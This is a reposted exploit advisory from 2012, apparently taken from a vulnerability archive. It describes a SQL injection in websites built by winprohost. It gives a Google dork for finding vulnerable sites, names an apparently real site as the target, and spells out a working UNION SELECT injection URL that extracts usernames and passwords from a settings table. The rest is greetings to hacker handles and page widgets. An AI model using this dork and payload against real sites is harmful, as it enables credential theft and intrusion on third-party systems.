winprohost SQL Injection Vulnerability

2012.09.09

Credit: BHG Security Center

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: Design & Host by winprohost.com

###########
winprohost Sql Injection Vulnerability
###########
# Exploit Title : winprohost Sql Injection Vulnerability
# Google Dork: Design & Host by winprohost.com
#Author: BHG Security Center
# Home: http://cc.black-hg.org - http://greyh4t.com/cc/
# Tested on: [linux+apache]
# Finder(s):Siavash (morghabi_s@yahoo.com)
# Examle:http://dr-nazari.com/display.php?x=4&id=186%27
http://dr-nazari.com/display.php?x=4&id=-186+Union+/*!Select*/+1,/*!group_concat%28UserName,0x3a,Password%29*/,3,4,5,6,7,8,9,10,11,12,13+/*!from+setting*/--
[-] Disclosure timeline:
[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[04/09/2012] - Public disclosure
# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t
~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf
===[End]===

References:

http://greyh4t.com/cc/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

winprohost SQL Injection Vulnerability

Dork: Design & Host by winprohost.com

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.